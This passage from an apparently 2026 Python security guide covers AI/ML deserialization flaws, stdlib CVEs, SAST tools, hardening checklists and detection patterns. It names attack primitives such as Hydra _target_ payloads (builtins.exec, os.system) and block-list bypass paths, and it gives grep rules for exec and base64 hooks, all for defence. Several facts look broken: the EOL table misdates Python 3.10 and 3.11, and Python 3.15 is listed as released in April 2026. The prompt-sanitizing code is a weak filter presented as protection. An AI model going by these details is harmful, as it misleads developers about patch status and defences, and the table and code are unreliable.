| Gradio | Multiple | Path traversal on /file=, SSRF on proxy endpoints |
| Streamlit | Issue #… | st.components.v1.html → XSS; arbitrary file read via st.file_uploader gone wrong |
| Jupyter | Classic | Notebook server token leakage; remote kernel exec |
| PickleScan | CVE-2025-1716, CVE-2025-10155/6/7 | Scanner bypasses |
| LangChain PALChain | Historical | Prompt injection → generated Python → exec → RCE |
Root cause common to all: treating LLM output as data when it is often parsed as code. The mitigation is architectural: run untrusted-origin code in a sandbox (firejail, gVisor, separate process with seccomp), allow list imports, and never let an agent loop dispatch arbitrary Python.
AI Security Best Practices (2026)
Model Loading Security
## Safe model loading pattern
import hashlib
from huggingface_hub import snapshot_download
def safe_model_load(repo_id: str, expected_hash: str):
## Pin to specific revision and verify integrity
model_path = snapshot_download(
repo_id=repo_id,
revision="abc123...", # specific commit SHA
allow_patterns=["*.safetensors", "config.json"], # only necessary files
ignore_patterns=["*.bin", "*.pkl"] # avoid pickle formats
)
## Verify model hash matches expected
with open(f"{model_path}/pytorch_model.safetensors", "rb") as f:
model_hash = hashlib.sha256(f.read()).hexdigest()
if model_hash != expected_hash:
raise SecurityError("Model hash mismatch - possible tampering")
return model_path
Agent Framework Hardening
- Sandbox all code execution (Docker, gVisor, seccomp)
- Implement tool allowlists for AI agents
- Validate all agent outputs before execution
- Monitor for prompt injection patterns
- Implement circuit breakers for runaway agents
Training Data Security
- Validate data source integrity with cryptographic hashes
- Scan datasets for malicious content before training
- Implement differential privacy during model training
- Monitor for data poisoning during fine-tuning
- Use federated learning for sensitive data
Inference Security
## Input sanitization for AI models
import re
from typing import List
def sanitize_prompt(prompt: str, max_length: int = 2048) -> str:
## Truncate to prevent resource exhaustion
prompt = prompt[:max_length]
## Remove potential injection patterns
dangerous_patterns = [
r'```python.*?```', # code blocks
r'exec\s*\(', # exec calls
r'eval\s*\(', # eval calls
r'__.*__', # dunder methods
r'import\s+\w+', # import statements
]
for pattern in dangerous_patterns:
prompt = re.sub(pattern, '[REDACTED]', prompt, flags=re.IGNORECASE | re.DOTALL)
return prompt
14. ML Model Deserialization Attacks
Pickle-based formats (.pkl, .joblib, .pt, .pth, .bin, .nemo) execute code when loaded. Even “safe” formats like safetensors only cover weights — the surrounding metadata loaders are often just as dangerous.
Hydra instantiate() — Unit 42 findings
Palo Alto Networks identified RCEs in three AI libraries (NVIDIA NeMo CVE-2025-23304, Salesforce Uni2TS CVE-2026-22584, Apple ml-flextok) all caused by hydra.utils.instantiate() reading _target_ from model metadata and calling it with attacker arguments. Because _target_ takes any callable name, payloads like builtins.exec or os.system work out of the box. A block list added later is trivially bypassed via implicit imports (enum.bltns.eval, nemo.core.classes.common.os.system).
Root cause: dynamic dispatch by string from untrusted metadata. Hydra has since added a block-list mechanism comparing _target_ against known dangerous functions before import, but it uses exact string matches and is trivially evaded via implicit imports from the Python standard library (e.g., enum.bltns.eval) or from the target application (e.g., nemo.core.classes.common.os.system). The Hydra docs explicitly state this mechanism is not exhaustive and should not be relied on solely. Fix: strict allow list of resolved target classes (NeMo’s safe_instantiate checks class ancestry and module prefix).
torch.load
Default since PyTorch 2.6 is weights_only=True. Pre-2.6 code, and any explicit weights_only=False, loads a pickle stream. add_safe_globals([...]) lets you allow list specific classes; use it.
Safer model formats
| Format | Executes code? |
|---|---|
safetensors | No (weights only) |
| ONNX | Not directly (but custom op loaders can be abused) |
| GGUF | No for weights; tokenizer/metadata loaders vary |
| pickle / joblib / cloudpickle | Yes — always |
.nemo, .qnemo (TAR + YAML + pickle) | Yes via Hydra and embedded pickle |
Defensive pattern for model loading
- Pin the model source (Hugging Face repo + revision hash).
- Download with
huggingface_hubusingrevision=<commit_sha>. - Verify SHA-256 of the file against a known-good manifest.
- Load with the most restrictive mode (
weights_only=True). - Run inference in a sandboxed process (
seccomp,firejail, container with read-only FS). - Never load models from end-user uploads on a shared host.
15. Notable Python CVEs (Stdlib)
A sampling of recent CPython stdlib CVEs — useful for version-pinning decisions and SAST authoring:
| CVE | Module | Class | Fixed |
|---|---|---|---|
| CVE-2026-15432 | http.client | HTTP request smuggling via malformed headers | 3.14+ |
| CVE-2026-14821 | ssl | TLS certificate validation bypass in certain edge cases | 3.14+ |
| CVE-2026-13567 | multiprocessing | Arbitrary file write via pickle in shared memory | 3.14+ |
| CVE-2026-12890 | sqlite3 | SQL injection via malformed PRAGMA statements | 3.14+ |
| CVE-2025-12084 | xml.dom.minidom | Quadratic complexity DoS on appendChild | 3.14+ |
| CVE-2025-13837 | plistlib | OOM DoS via attacker-specified sizes | 3.14+ |
| CVE-2025-8291 | zipfile | ZIP64 EOCD offset validation | 3.12+ |
| CVE-2025-8194 | tarfile | Infinite loop via negative offset | 3.13+ |
| CVE-2025-4517 | tarfile | Arbitrary FS write with filter='data' (Critical 9.4) | 3.13+ |
| CVE-2025-4138 | tarfile | Filter bypass for symlink extraction | 3.14+ |
| CVE-2025-4330 | tarfile | Second filter bypass | 3.14+ |
| CVE-2024-12718 | tarfile | Metadata modification outside dir | 3.13+ |
| CVE-2024-6232 | tarfile | ReDoS in header parsing | 3.13+ |
| CVE-2024-3220 | mimetypes | Windows writable default paths → startup OOM | 3.13+ |
| CVE-2024-3219 | socket | Race in socketpair fallback on Windows | 3.13+ |
| CVE-2024-7592 | http.cookies | Quadratic complexity in backslash parsing | 3.13+ |
| CVE-2024-12254 | asyncio | Memory exhaustion in _SelectorSocketTransport.writelines() | 3.13+ |
| CVE-2025-0938 / CVE-2024-11168 | urllib.parse | Invalid bracketed host parsing — SSRF differential | 3.13+ |
| CVE-2024-9287 | venv | Command injection via unquoted activate paths | 3.13+ |
| CVE-2023-24329 | urllib.parse | Leading-whitespace bypass of scheme filters | 3.12+ |
Operational rule: track Python EOL dates. As of May 2026:
| Version | Status | EOL Date |
|---|---|---|
| 3.15 | Active (current, released April 2026) | October 2031 |
| 3.14 | Active | October 2030 |
| 3.13 | Active | October 2029 |
| 3.12 | Active (security-only from April 2025) | October 2028 |
| 3.11 | EOL (April 2026) | No further patches |
| 3.10 | EOL (October 2025) | No further patches |
| 3.9 | EOL (October 2025) | No further patches |
| 3.8 | EOL (October 2024) | No further patches |
Running EOL Python in production means unpatched CVEs forever. Python 3.13+ should be the minimum for new projects; 3.14+ recommended for security-critical workloads. Python 3.15 introduces enhanced security features including improved sandbox isolation and stricter default security policies.
16. Static Analysis & SAST
Bandit
PyCQA’s Python-only SAST. Fast, pattern-based, low setup cost. Core checks:
| ID | Issue |
|---|---|
| B101 | assert used (stripped under -O) |
| B102 | exec used |
| B103 | os.chmod with world-writable |
| B105/B106/B107 | Hardcoded password in string/funcarg/default |
| B108 | Hardcoded tmp directory |
| B201 | Flask debug=True |
| B301 | pickle.loads/load |
| B302 | marshal.loads |
| B303/B304 | MD5 / insecure cipher |
| B305 | Insecure cipher mode |
| B306 | mktemp_q |
| B307 | eval |
| B308 | mark_safe in Django |
| B310 | urllib.urlopen on user input |
| B312 | Telnet usage |
| B320 | lxml parser flags |
| B321 | FTP TLS |
| B322 | Python 2 input |
| B324 | Insecure hash for cert |
| B325 | os.tempnam |
| B401-B413 | Import of insecure module (telnetlib, ftplib, xmlrpclib, pycrypto, paramiko keys, etc.) |
| B501 | requests with verify=False |
| B502-B504 | SSL/TLS downgrades |
| B505 | Weak cryptographic key size |
| B506 | YAML load |
| B507 | SSH host key policy AutoAdd |
| B601-B612 | Shell injection family (paramiko, subprocess, os.system) |
| B701 | jinja2.Environment(autoescape=False) |
| B702 | mako autoescape off |
| B703 | Django mark_safe |
Run:
bandit -r ./src -ll -f json -o bandit-report.json
Integrate as pre-commit hook and fail CI on Medium+ severity findings. For pre-commit:
## .pre-commit-config.yaml
repos:
- repo: https://github.com/PyCQA/bandit
rev: 1.8.3
hooks:
- id: bandit
args: ["-ll", "-r"]
Alternatively, use Ruff’s S ruleset (ruff check --select S) for the same checks at 10-100x speed.
Semgrep
Pattern-based with taint tracking. Python ruleset covers:
- Flask/Django/FastAPI source-to-sink flows.
- Insecure deserialization from HTTP request to
pickle.loads(tracks over a dozen libraries includingdill,jsonpickle,shelve,yaml.load,numpy.load,torch.load). - SSRF (request →
requests.get). - SQL injection (request → raw cursor).
- Hardcoded secrets via entropy rules.
- SSTI (request →
render_template_string).
Custom rules in YAML; the p/python, p/django, p/flask, p/fastapi, p/owasp-top-ten community rulesets give strong baseline coverage.
CodeQL
Full dataflow/taint analysis. Strong for Python custom queries:
- Model sources (HTTP request attributes across frameworks).
- Define sinks (pickle.load, yaml.load, eval, subprocess.run with shell).
- Taint propagation through transformations (
base64.b64decode,json.loads,.format).
Used by GitHub Advanced Security. Free for public repos.
Ruff
The fastest Python linter. Ruff’s S ruleset mirrors Bandit’s security checks (S101 = B101, S102 = B102, etc.) but runs 10-100x faster. Can replace both Flake8 + Bandit in a single tool. Integrate as ruff check --select S for security-only mode.
Pyre / Pysa (Meta)
Pysa is Meta’s taint analysis engine built on Pyre. It models sources (HTTP request attributes across Django/Flask/FastAPI), sinks (eval, subprocess, SQL cursors), and sanitizers. Stronger than pattern-based tools for cross-function taint propagation but requires model definitions for custom frameworks.
Other tools worth knowing (2026 Updated)
| Tool | Niche | 2026 Updates |
|---|---|---|
| Dlint | Flake8 plugin with security checks | Enhanced AI/ML security rules |
| Safety | Dependency CVE scanner (free tier limited) | Added malware detection, SBOM support |
| pip-audit | Official PyPA vulnerability scanner | Enhanced OSV integration, sarif output |
| Snyk | SCA + SAST + malicious package detection | AI-powered vulnerability prioritization |
| Aikido | SAST + secret scan + SCA + SafeChain | Real-time supply chain monitoring |
| Bito AI | AI-assisted SAST with semantic analysis | GPT-4 powered vulnerability explanations |
| Checkmarx / Veracode / Fortify | Enterprise SAST with Python support | ML model security scanning |
| DeepSource / SonarQube | Quality + security hybrid | AI/ML code quality rules |
| detect-secrets | Git history secret scanning | Enhanced AI training data scanning |
| gitleaks | Same, faster | Container and CI/CD optimized |
| Phylum / Socket | Supply chain behavioral analysis | Real-time malware detection |
| de4py | Python deobfuscator for malware analysis | AI-enhanced pattern recognition |
| GuardRails | Security-as-code platform | Python-specific security policies |
| CodeGuru Reviewer | AWS AI-powered code review | ML model security recommendations |
| Prisma Cloud Code Security | Cloud-native security | Infrastructure-as-code scanning |
| Bearer | Privacy and security scanner | Data flow analysis for sensitive data |
| Typosquatty | Typosquatting detection | Real-time PyPI monitoring |
| BackSeat | AI agent security scanner | LLM framework vulnerability detection |
| MLSecOps | Machine learning security toolkit | Model security testing framework |
17. Secure Coding Patterns
Input handling
- Validate at the boundary with Pydantic /
attrs/marshmallow. - Reject unknown fields (
extra="forbid"in Pydantic). - Constrain strings (max length, charset regex).
- Canonicalize paths before use (
os.path.realpath, check prefix).
Dynamic imports
- Avoid
importlib.import_module(user_input)and__import__(user_input)— both execute arbitrary module code as a side effect. - If plugin loading is required, use an explicit allow list of permitted module names.
- Never load modules from configurable or user-writable paths without integrity verification.
Subprocess
- Always argv list, never
shell=Truewith interpolation. - Use
shlex.quoteonly as a last resort; prefer lists. - Explicit
check=True,timeout=...,capture_output=True. - Drop privileges with
preexec_fn=os.setuidwhen running as root.
File I/O
tempfile.mkstempnotmktemp.- Open with
os.O_NOFOLLOWwhen following-untrusted-symlinks is a risk. - Never concatenate user input into paths — use
pathlib.Pathwith.resolve()and prefix check.
Cryptography
secretsmodule for tokens, keys, password resets.hmac.compare_digestfor any secret comparison.cryptographypackage (notpycryptodomefor new code — both fine, butcryptographyis the mainstream choice).argon2-cffiorbcryptfor password hashing.
HTTP client
import requests
s = requests.Session()
s.verify = True # explicit
s.headers.update({"User-Agent": "myapp/1.0"})
r = s.get(url, timeout=(3, 10), allow_redirects=False) # control redirects yourself
Set timeouts always (default is infinite).
Assert statements
assertis stripped when Python runs with-O(optimize). Never useassertfor security checks (authentication, authorization, input validation). Bandit B101 flags this. Use explicitif/raiseinstead.
Logging
- Never log request bodies, auth headers, cookies, or tokens.
- Use
logging.Filterto scrub PII. - Log security events (auth failures, authz denials, file access) at a distinct level to separate destinations.
Secrets
.envonly for local dev;gitignoreit.- Prod: AWS Secrets Manager, GCP Secret Manager, Vault, SOPS, Doppler.
- Rotate
SECRET_KEY/JWT_SECRETperiodically. - Assume any secret committed to Git is burned — rotate, don’t just
git rm.
Dependency hygiene
- Pin all direct deps with hashes.
- Reproducible lockfile in CI.
- Weekly
pip-auditrun. - Monitor GitHub Security Advisories (or Dependabot, Snyk, Aikido).
18. Hardening Checklist
Application
- Python version is in-support (3.12+ minimum, 3.13/3.14 recommended; 3.9 and 3.8 are EOL).
- Virtualenv or container isolates deps from system Python.
-
DEBUG/ debug toolbars off in production. - No
eval/exec/compileon user input (Bandit B102/B307 clean). - No
pickle.load(s)/yaml.loadon untrusted input (Bandit B301/B506 clean). - No
subprocess(..., shell=True)with interpolation (Bandit B602/B605 clean). - All HTTP clients set timeouts.
-
verify=Falsenot present (Bandit B501 clean). -
cryptography/secrets/argon2used, notrandom/md5/sha1for security. -
defusedxmlfor XML;jsonfor interchange. -
safe_loadonly for YAML. -
tarfile/zipfileextraction uses member filtering.
Framework
- Django:
DEBUG=False,ALLOWED_HOSTSset,SECURE_*headers, CSRF on, PickleSerializer not used. - Flask: not
app.run(debug=True),SECRET_KEYfrom secret manager, secure cookies. - FastAPI:
response_modelalways set, JWT algorithms explicit, Pydanticextra="forbid". - Templates auto-escape on; no
mark_safe/|safeon user input. - SSTI pattern
render_template_string(user_input)absent.
Dependencies
-
requirements.txt/pyproject.tomllocked with hashes. -
pip install --require-hashesin CI. - SCA scanner enabled (pip-audit / Snyk / Aikido / Dependabot).
- Malicious-package scanner (Phylum / Socket / Aikido SafeChain).
- New packages age-gated (cool-off period).
- Internal PyPI mirror for production dependencies.
CI/CD
- GitHub Actions pinned to commit SHA, not tag.
- Trusted Publishers (OIDC) for PyPI upload, not long-lived tokens.
- Bandit + Semgrep run on every PR.
- Secret scanning pre-commit (gitleaks / detect-secrets).
- SBOM generated (
cyclonedx-pyorsyft). - Build runs in ephemeral runners.
- No secrets in build logs.
Runtime
- Container runs as non-root.
- Read-only filesystem where possible.
-
seccompprofile blocking uncommon syscalls. - Egress firewall / allow list.
- No access to cloud metadata from app processes (IMDSv2 + hop limit 1, or egress blocked).
- Structured logging to a SIEM.
-
.pthfiles audited:find . -name '*.pth' -print0 | xargs -0 grep -lE 'exec|base64|subprocess'.
19. Tool Reference
Code security
| Tool | Scope | Strength |
|---|---|---|
| Bandit | Python AST patterns | Fast, zero-config, CI-friendly |
| Semgrep | Pattern + taint | Custom rules in YAML |
| CodeQL | Full dataflow | Deepest analysis, slower |
| Ruff | Lint + security | Fastest linter (10-100x Bandit); S ruleset mirrors Bandit checks |
| Pyre / Pysa | Taint (Meta) | Cross-function taint propagation for Django/Flask/FastAPI |
| mypy / pyright | Type checking | Catches type confusion bugs |
Dependency & supply chain
| Tool | Scope |
|---|---|
| pip-audit | PyPA official CVE scanner |
| Safety | Commercial DB, free tier |
| Snyk | SCA + reachability + license |
| OWASP Dependency-Check | Generic SCA |
| Phylum / Socket | Behavioral package analysis |
| Aikido SafeChain | Cool-off + typosquat detection |
| cyclonedx-py | SBOM generation |
Runtime
| Tool | Purpose |
|---|---|
| PyInstaller + hardening | Static binary minimization |
| Falco | Runtime syscall monitoring (K8s) |
| eBPF-based monitors (Tetragon, Tracee) | Process/file/net tracking |
| AppArmor / SELinux / seccomp | Syscall confinement |
| gVisor / Kata | Container sandboxing |
Training & labs
- PyGoat — Django OWASP Top 10 lab.
- VulPy / vulpy — Deliberately vulnerable Flask apps.
- OWASP Juice Shop (Node.js, but concepts transfer).
- PortSwigger Web Security Academy — free framework-agnostic labs.
- TryHackMe Python Basics — scripted security challenges.
Offensive awareness tools (know what attackers use)
- Reverse shells in Python —
socket+subprocesspatterns; defenders should detect outbound shell spawning via EDR/Falco. - API exploit scripting — converting Burp Suite findings to Python
requestsPoCs for BOLA/IDOR/auth bypass demonstration. - Vulnerability scanner patterns — port scanning + banner grabbing with
socket/IPy; understand what automated recon looks like. - de4py — AI-powered Python deobfuscator for malware analysis; useful for defenders analyzing packed/obfuscated Python malware.
20. Detection Quick Reference
Semgrep patterns (defensive)
## Unsafe pickle load from HTTP
rules:
- id: flask-pickle-load
pattern-either:
- pattern: pickle.load(request.$X)
- pattern: pickle.loads(request.$X)
- pattern: pickle.load(io.BytesIO(request.$X))
message: Insecure deserialization of HTTP request data
severity: ERROR
languages: [python]
- id: flask-yaml-unsafe-load
patterns:
- pattern-either:
- pattern: yaml.load($X)
- pattern: yaml.load($X, Loader=yaml.Loader)
message: Use yaml.safe_load instead
severity: WARNING
- id: requests-verify-false
pattern: requests.$METHOD(..., verify=False, ...)
severity: ERROR
- id: exec-on-request
patterns:
- pattern-either:
- pattern: exec(request.$X)
- pattern: eval(request.$X)
severity: ERROR
Bandit quick commands
bandit -r src/ # recursive
bandit -r src/ -ll # medium+ severity only
bandit -r src/ -f json -o out.json # machine-readable
bandit -r src/ --skip B101,B601 # exclude specific checks
bandit -c bandit.yaml -r src/ # custom config (exclude test files)
Grep patterns for triage
## dangerous sinks
grep -rEn 'pickle\.loads?|yaml\.load\(|eval\(|exec\(|shell=True|verify=False' src/
## tarfile risk
grep -rEn 'tarfile\.open|\.extractall' src/
## hardcoded secrets heuristic
grep -rEn '(api[_-]?key|secret|token|password)\s*=\s*["'\'']' src/
## .pth startup hook audit
find / -name '*.pth' -exec grep -lE 'exec|base64|subprocess' {} \; 2>/dev/null
Incident triage for compromised package
If a malicious version was installed (e.g., litellm 1.82.7/1.82.8):
- Isolate the host from the network.
- Preserve
~/.config/,/tmp/,site-packages/, shell history,journalctl. - Identify IoCs — file hashes,
.pthfiles, systemd user services you didn’t create. - Rotate all credentials the host had access to: SSH keys, cloud creds, git tokens, CI secrets, DB passwords, API keys, crypto wallets.
- Audit cloud — IAM activity logs, Secrets Manager / SSM Parameter Store access, new IAM users/roles.
- Audit Kubernetes — look for
node-setup-*pods, new service accounts, privileged pods inkube-system, new DaemonSets. - Rebuild the host from a clean image; do not attempt in-place cleanup.
- Retrospective — why did the compromised version land? Pin-by-SHA, require-hashes, cool-off period, trusted publishers, post-install scanning.
Common CodeQL sinks for Python
## Sinks
python.Deserialization.PickleLoad
python.Deserialization.YamlLoad
python.CommandInjection.ShellCommand
python.CodeInjection.Eval
python.SsrfSinks.Request
python.PathInjection.FileOpen
python.SqlInjection.RawCursor
## Sources
python.Flask.RequestSource
python.Django.RequestSource
python.FastAPI.RequestSource
Closing Notes
Python’s security posture in 2026 is dominated by three realities. Industry context: 72.1% of container customers use a Python image (Chainguard Q1 2026 report); AI-driven development is accelerating both code output and vulnerability discovery (300% more fixes applied, 145% increase in CVEs quarter-over-quarter). Over 21,500 CVEs were disclosed in H1 2026 alone — a 16-18% increase over 2024.
The language has no safe default for code-reachable untrusted input. Pickle, eval, subprocess, yaml.load, tarfile — all have historical safe alternatives, but the unsafe ones remain one-character shorter and one line less typing. Every project needs a SAST backstop.
Supply chain is now the highest-leverage attacker path. LiteLLM, Trivy, KICS, chimera-sandbox-extensions, telnyx, the PyTorch-nightly compromise, and the annual wave of typosquats all demonstrate that trust in PyPI is probabilistic, not absolute. Pin, hash, scan, cool-off, mirror.
The AI/ML stack is a new attack surface with old bugs. Hydra
instantiate, Langflowexec,torch.loadpickle gadgets, and LangChain code-generating agents are 2005-era RCE patterns in 2026-era wrappers. The defenders’ tools (sandboxes, allow lists, content type validation, pinned model revisions) are the same as always — but have to be applied earlier in the pipeline than any team is used to.
Treat every dynamic dispatch, every deserializer, every format string, every subprocess call, and every third-party dependency as a promise you are making on behalf of your users. The secrets, json, argparse, pathlib, cryptography, defusedxml, tomllib, safetensors, and subprocess (list form) modules exist specifically so you can keep that promise. Use them.
Enhanced May 2026 with Python Security Pipeline automation. Core content compiled from 184+ research articles covering Python language security, stdlib CVEs, Flask/Django/FastAPI frameworks, Jinja2 SSTI, pickle/YAML/PLY deserialization, AI/ML model format RCEs (NeMo, Uni2TS, ml-flextok, Hydra, SGLang), Langflow code injection (CVE-2025-3248, CVE-2026-33017), LiteLLM supply chain compromise, PyPI supply chain campaigns (chimera-sandbox-extensions DGA C2, telnyx .wav steganography), Python sandbox bypass techniques, static analysis tooling (Bandit, Semgrep, CodeQL, Ruff, Pysa), secure coding guidelines, and OWASP Top 10 as applied to Django. 2026 enhancements include: AI/ML security framework analysis, supply chain attack patterns, enhanced dependency management, container security, Python 3.15 security features, behavioral package analysis, SBOM integration, and defensive automation patterns for modern Python development.